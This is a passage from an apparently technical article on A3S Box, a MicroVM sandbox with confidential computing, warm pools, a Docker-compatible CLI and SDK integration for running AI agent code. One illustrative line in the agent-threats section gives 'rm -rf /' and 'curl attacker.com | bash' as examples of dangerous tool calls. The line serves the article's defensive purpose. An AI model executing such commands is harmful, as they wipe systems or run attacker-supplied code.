&lt;p&gt;RA-TLS (Remote Attestation TLS) is a key innovation in A3S Box. It embeds the SNP attestation report into the extension fields of an X.509 certificate, so that the TLS handshake process simultaneously completes both identity verification and remote attestation.&lt;/p&gt;

&lt;p&gt;This means that when the host establishes a TLS connection with the MicroVM, it not only verifies the identity of the communication peer but also verifies that the peer is running in a trusted TEE environment. This eliminates the TOCTOU (time-of-check to time-of-use) vulnerability that arises when attestation and communication are performed separately, as in traditional approaches.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.4 Sealed Storage
&lt;/h3&gt;

&lt;p&gt;Sealed Storage allows a MicroVM to encrypt and persist sensitive data, which can only be decrypted in the same (or compatible) TEE environment. A3S Box uses AES-256-GCM encryption, HKDF-SHA256 key derivation, and provides three sealing policies:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy&lt;/th&gt;
&lt;th&gt;Binding Factor&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MeasurementAndChip&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Image hash + physical chip ID&lt;/td&gt;
&lt;td&gt;Strictest: data bound to specific image and specific hardware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;MeasurementOnly&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Image hash only&lt;/td&gt;
&lt;td&gt;Can migrate across hardware, but must be the same image&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ChipOnly&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Physical chip ID only&lt;/td&gt;
&lt;td&gt;Survives firmware updates, but bound to specific hardware&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Additionally, sealed storage implements version-based rollback protection (&lt;code&gt;VersionStore&lt;/code&gt;), preventing attackers from replacing newer sealed data with older versions.&lt;/p&gt;
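&lt;p&gt;The policy table maps naturally onto key derivation: each policy chooses which factors feed the KDF, so data sealed under one binding cannot be unsealed under another. A stdlib-only sketch of that derivation step (HKDF-SHA256 per RFC 5869; the root secret, labels, and function names are illustrative, and the AES-256-GCM encryption itself is omitted):&lt;/p&gt;

```python
import hmac, hashlib

def hkdf_sha256(ikm, salt, info, length=32):
    # Minimal HKDF-SHA256 (RFC 5869) extract-and-expand, stdlib only.
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    okm, block, counter = b"", b"", 1
    while length > len(okm):
        block = hmac.new(prk, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]

def sealing_key(policy, measurement, chip_id, root_secret):
    # Bind the key to whichever factors the policy names.
    binding = {
        "MeasurementAndChip": measurement + chip_id,
        "MeasurementOnly": measurement,
        "ChipOnly": chip_id,
    }[policy]
    return hkdf_sha256(root_secret, b"a3s-seal", binding)

k1 = sealing_key("MeasurementOnly", b"m1" * 24, b"c1" * 32, b"secret")
k2 = sealing_key("MeasurementOnly", b"m2" * 24, b"c1" * 32, b"secret")
assert k1 != k2   # different image, different key
k3 = sealing_key("ChipOnly", b"m1" * 24, b"c1" * 32, b"secret")
k4 = sealing_key("ChipOnly", b"m2" * 24, b"c1" * 32, b"secret")
assert k3 == k4   # ChipOnly ignores the measurement
```

&lt;p&gt;Under &lt;code&gt;MeasurementAndChip&lt;/code&gt;, changing either the image hash or the physical chip changes the derived key — which is exactly the "strictest" binding the table describes.&lt;/p&gt;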




&lt;h2&gt;
  
  
  6. Core Value 3: MicroVM with 200ms Cold Start
&lt;/h2&gt;

&lt;h3&gt;
  
  
  6.1 Why Does Startup Speed Matter?
&lt;/h3&gt;

&lt;p&gt;In serverless and event-driven architectures, workload lifetimes may be only a few hundred milliseconds to a few seconds. If a virtual machine takes seconds to start, the startup overhead would account for a large proportion of the total workload time, making MicroVM solutions impractical in these scenarios.&lt;/p&gt;

&lt;p&gt;A3S Box achieves approximately 200ms cold start time through libkrun. This number means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;For a serverless function with 1-second execution time, startup overhead is only 20%&lt;/li&gt;
&lt;li&gt;For interactive workloads, users barely perceive the startup delay&lt;/li&gt;
&lt;li&gt;In CI/CD scenarios, each build step can run in an independent MicroVM without significantly increasing total build time&lt;/li&gt;
&lt;/ul&gt;
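&lt;p&gt;The arithmetic behind the first bullet is worth making explicit (a trivial helper, not project code):&lt;/p&gt;

```python
def startup_overhead(cold_start_ms, run_ms):
    # Startup cost relative to the workload's own execution time.
    return cold_start_ms / run_ms

assert startup_overhead(200, 1_000) == 0.2     # 200ms MicroVM: 20%
assert startup_overhead(2_000, 1_000) == 2.0   # 2s traditional VM: 200%
```

&lt;p&gt;A seconds-scale VM start would dominate a short function's own runtime, which is why the ~200ms figure marks the threshold of practicality for serverless workloads.&lt;/p&gt;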

&lt;h3&gt;
  
  
  6.2 Startup Flow Optimization
&lt;/h3&gt;

&lt;p&gt;A3S Box's startup flow is carefully optimized:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[0ms]    VmController::start() is called
[5ms]    Locate a3s-box-shim binary
[10ms]   macOS: check/sign hypervisor entitlement
[15ms]   Serialize InstanceSpec to JSON
[20ms]   Start shim subprocess
[25ms]   shim calls libkrun FFI to create VM context
[30ms]   Configure vCPU, memory, virtio-fs, vsock
[50ms]   libkrun starts VM (kernel boot)
[150ms]  Guest Init (PID 1) begins execution
[160ms]  Mount filesystems
[170ms]  Configure networking
[180ms]  Start vsock servers
[200ms]  VM ready, accepting commands
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.3 Warm Pool: Eliminating Cold Starts
&lt;/h3&gt;

&lt;p&gt;For scenarios extremely sensitive to latency, A3S Box provides a Warm Pool mechanism — pre-starting a batch of MicroVMs so that when a request arrives, a ready VM is directly allocated, achieving near-zero startup latency.&lt;/p&gt;

&lt;p&gt;Core warm pool parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;min_idle&lt;/code&gt;: Minimum number of idle VMs (default 1)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;max_size&lt;/code&gt;: Maximum number of VMs in the pool (default 5)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;idle_ttl_secs&lt;/code&gt;: Idle VM time-to-live (default 300 seconds)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The warm pool also integrates an auto-scaler (&lt;code&gt;PoolScaler&lt;/code&gt;) that dynamically adjusts &lt;code&gt;min_idle&lt;/code&gt; based on hit/miss rates within a sliding window:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When the miss rate exceeds &lt;code&gt;scale_up_threshold&lt;/code&gt; (default 0.3), increase the number of pre-warmed VMs&lt;/li&gt;
&lt;li&gt;When the miss rate falls below &lt;code&gt;scale_down_threshold&lt;/code&gt; (default 0.05), decrease the number of pre-warmed VMs&lt;/li&gt;
&lt;li&gt;A cooldown period (default 60 seconds) prevents frequent oscillation&lt;/li&gt;
&lt;/ul&gt;
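&lt;p&gt;The scaling rule reduces to a few lines; here is an illustrative sketch using the defaults quoted above (Python; the class shape is ours, and the cooldown timer is omitted for brevity):&lt;/p&gt;

```python
# Sketch of sliding-window miss-rate autoscaling for a warm pool.
class PoolScaler:
    def __init__(self, min_idle=1, max_size=5,
                 scale_up_threshold=0.3, scale_down_threshold=0.05):
        self.min_idle = min_idle
        self.max_size = max_size
        self.up = scale_up_threshold
        self.down = scale_down_threshold
        self.window = []          # recent requests: True = pool hit

    def record(self, hit):
        self.window = (self.window + [hit])[-100:]   # sliding window

    def step(self):
        if not self.window:
            return self.min_idle
        miss_rate = self.window.count(False) / len(self.window)
        if miss_rate > self.up:
            self.min_idle = min(self.max_size, self.min_idle + 1)
        elif self.down > miss_rate:
            self.min_idle = max(1, self.min_idle - 1)
        return self.min_idle

scaler = PoolScaler()
for _ in range(10):
    scaler.record(False)          # a burst of cold-start misses...
assert scaler.step() == 2         # ...grows the pre-warmed pool
```

&lt;p&gt;The real &lt;code&gt;PoolScaler&lt;/code&gt; additionally enforces the 60-second cooldown described above, which keeps a noisy miss rate from oscillating the pool size.&lt;/p&gt;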




&lt;h2&gt;
  
  
  7. Core Value 4: Full Docker-Compatible Experience
&lt;/h2&gt;

&lt;h3&gt;
  
  
  7.1 52 Docker-Compatible Commands
&lt;/h3&gt;

&lt;p&gt;A3S Box provides 52 Docker CLI-compatible commands, covering all aspects of container lifecycle management. Developers can seamlessly migrate existing Docker workflows to A3S Box without modifying scripts or learning new command syntax.&lt;/p&gt;

&lt;p&gt;Core command examples:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run a MicroVM (equivalent to docker run)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; my-app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx:latest

&lt;span class="c"&gt;# Execute a command (equivalent to docker exec)&lt;/span&gt;
a3s-box &lt;span class="nb"&gt;exec &lt;/span&gt;my-app &lt;span class="nb"&gt;cat&lt;/span&gt; /etc/nginx/nginx.conf

&lt;span class="c"&gt;# Interactive terminal (equivalent to docker exec -it)&lt;/span&gt;
a3s-box &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; my-app /bin/bash

&lt;span class="c"&gt;# View logs&lt;/span&gt;
a3s-box logs my-app

&lt;span class="c"&gt;# List running MicroVMs&lt;/span&gt;
a3s-box ps

&lt;span class="c"&gt;# Stop and remove&lt;/span&gt;
a3s-box stop my-app
a3s-box &lt;span class="nb"&gt;rm &lt;/span&gt;my-app

&lt;span class="c"&gt;# Image management&lt;/span&gt;
a3s-box images
a3s-box pull ubuntu:22.04
a3s-box push myregistry.io/my-image:v1

&lt;span class="c"&gt;# Network management&lt;/span&gt;
a3s-box network create my-network
a3s-box network connect my-network my-app

&lt;span class="c"&gt;# Volume management&lt;/span&gt;
a3s-box volume create my-data
a3s-box run &lt;span class="nt"&gt;-v&lt;/span&gt; my-data:/data my-app

&lt;span class="c"&gt;# Audit query&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"action=exec"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7.2 Why Is Compatibility So Important?
&lt;/h3&gt;

&lt;p&gt;From a technology adoption perspective, whether a new technology is widely accepted depends on two factors: &lt;strong&gt;value increment&lt;/strong&gt; and &lt;strong&gt;migration cost&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;A3S Box's value increment is enormous — upgrading from shared-kernel isolation to hardware-level isolation, with optional confidential computing. But if the migration cost is equally enormous (needing to rewrite all deployment scripts, learn a completely new CLI, change team workflows), most teams will choose to stay with existing solutions.&lt;/p&gt;

&lt;p&gt;By providing a Docker-compatible CLI, A3S Box reduces migration cost to a minimum:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migration&lt;/span&gt;
docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx

&lt;span class="c"&gt;# After migration (just replace the command name)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is not just a command name replacement. A3S Box is compatible with Docker's image format (OCI standard), network model, volume mount semantics, and environment variable passing. Existing Dockerfiles can be used without modification.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. Core Value 5: Secure Isolation Sandbox for AI Agents
&lt;/h2&gt;

&lt;h3&gt;
  
  
  8.1 Security Challenges in the AI Agent Era
&lt;/h3&gt;

&lt;p&gt;Large language model (LLM)-driven AI Agents are evolving from "conversational assistants" to "autonomous executors" — they not only generate text, but can also write code, call tools, manipulate filesystems, and initiate network requests. This leap in capability brings entirely new security challenges:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Untrusted code execution.&lt;/strong&gt; Code generated by AI Agents is inherently untrusted. Even the most advanced LLMs may generate malicious code due to hallucination, prompt injection, or adversarial inputs. Executing such code in an unprotected environment is equivalent to handing control of the host machine to an unpredictable entity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Side effects of tool calls.&lt;/strong&gt; Agents interact with the external world through tools — executing shell commands, reading/writing files, accessing databases, calling APIs. Each tool call may produce irreversible side effects. If an Agent directly executes &lt;code&gt;rm -rf /&lt;/code&gt; or &lt;code&gt;curl attacker.com | bash&lt;/code&gt; on the host machine, the consequences would be catastrophic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multi-tenant Agent platforms.&lt;/strong&gt; SaaS platforms run Agents from different users, each with different permission levels and trust levels. A malicious user's Agent should not be able to affect other users' Agents or the platform itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.2 Why Are Traditional Containers Not Enough?
&lt;/h3&gt;

&lt;p&gt;Many AI Agent frameworks use Docker containers as sandboxes. But as analyzed in Section 1, traditional container isolation is based on the shared-kernel namespace mechanism — a single kernel vulnerability can allow malicious code generated by an Agent to escape to the host machine.&lt;/p&gt;

&lt;p&gt;For AI Agent scenarios, this risk is amplified:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Larger attack surface&lt;/strong&gt;: Agents may execute arbitrary syscalls, increasing the probability of probing kernel vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Higher attack frequency&lt;/strong&gt;: Agents continuously generate and execute code, with each execution being a potential attack attempt&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Smarter attacks&lt;/strong&gt;: Unlike traditional random fuzzing, LLMs can understand and deliberately exploit vulnerabilities&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box's MicroVM isolation fundamentally solves this problem — even if code generated by an Agent exploits a zero-day Linux kernel vulnerability, it cannot break through the hardware virtualization boundary.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.3 SDK-Driven Sandbox Integration
&lt;/h3&gt;

&lt;p&gt;A3S Box is not just a command-line tool, but an embeddable sandbox runtime. Through Rust/Python/TypeScript SDKs, AI Agent frameworks can integrate A3S Box directly into their own code as a library:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Python Agent framework integration example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;a3s_box&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SecureAgentExecutor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;execute_agent_code&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;code&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Execute Agent-generated code in an isolated sandbox&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="c1"&gt;# Create a one-time sandbox (independent MicroVM)
&lt;/span&gt;        &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;:3.11&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;512&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="c1"&gt;# Execute untrusted code in the sandbox
&lt;/span&gt;        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-c&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;code&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;stdout&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;stderr&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;exit_code&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit_code&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="c1"&gt;# sandbox is automatically destroyed when scope ends
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;TypeScript Agent framework integration example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;BoxSdk&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@a3s/box&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SecureToolExecutor&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="nf"&gt;executeShellCommand&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ToolResult&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Each tool call executes in an independent MicroVM&lt;/span&gt;
        &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
            &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ubuntu:22.04&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;memoryMib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;

        &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;bash&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;-c&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="na"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exitCode&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key advantage of this integration pattern is: &lt;strong&gt;each code execution takes place in a brand new, isolated MicroVM&lt;/strong&gt;. Even if an Agent performs destructive operations in one execution (deleting files, modifying system configuration), it only affects that MicroVM itself — the next execution will start in a clean environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 Warm Pool Accelerates Agent Response
&lt;/h3&gt;

&lt;p&gt;AI Agents typically follow a "think-execute-observe" loop — the Agent generates code, executes it, observes the output, then decides the next step. The speed of this loop directly affects user experience.&lt;/p&gt;

&lt;p&gt;If each execution requires a 200ms cold start, an Agent task with 10 tool calls would add 2 seconds of extra latency. The warm pool mechanism plays a key role here:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without warm pool:  [200ms start] [exec] [200ms start] [exec] [200ms start] [exec] ...
                                                    Total extra latency: N x 200ms

With warm pool:     [~0ms acquire] [exec] [~0ms acquire] [exec] [~0ms acquire] [exec] ...
                                                    Total extra latency: ~0ms
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The warm pool's auto-scaling is particularly suited for Agent scenarios — Agent tool calls are typically bursty (dense calls during a task, idle between tasks), and &lt;code&gt;PoolScaler&lt;/code&gt; automatically adjusts the number of pre-warmed VMs based on hit rate.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.5 Seven-Layer Defense Against Agent Threats
&lt;/h3&gt;

&lt;p&gt;Each layer of A3S Box's seven-layer defense-in-depth has a clear defensive target in AI Agent scenarios:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defense Layer&lt;/th&gt;
&lt;th&gt;Agent Threat Countered&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Hardware virtualization&lt;/td&gt;
&lt;td&gt;Agent exploiting kernel vulnerabilities to escape&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TEE memory encryption&lt;/td&gt;
&lt;td&gt;Agent attempting to read other tenants' memory data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Independent kernel&lt;/td&gt;
&lt;td&gt;Agent's kernel-level attacks don't affect other sandboxes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Namespaces&lt;/td&gt;
&lt;td&gt;Agent cannot see processes and files outside the sandbox&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Capability stripping&lt;/td&gt;
&lt;td&gt;Agent cannot perform privileged operations (e.g., mounting devices)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp BPF&lt;/td&gt;
&lt;td&gt;Agent cannot call dangerous syscalls (e.g., &lt;code&gt;kexec_load&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;no-new-privileges&lt;/td&gt;
&lt;td&gt;Agent cannot escalate privileges via SUID binaries&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
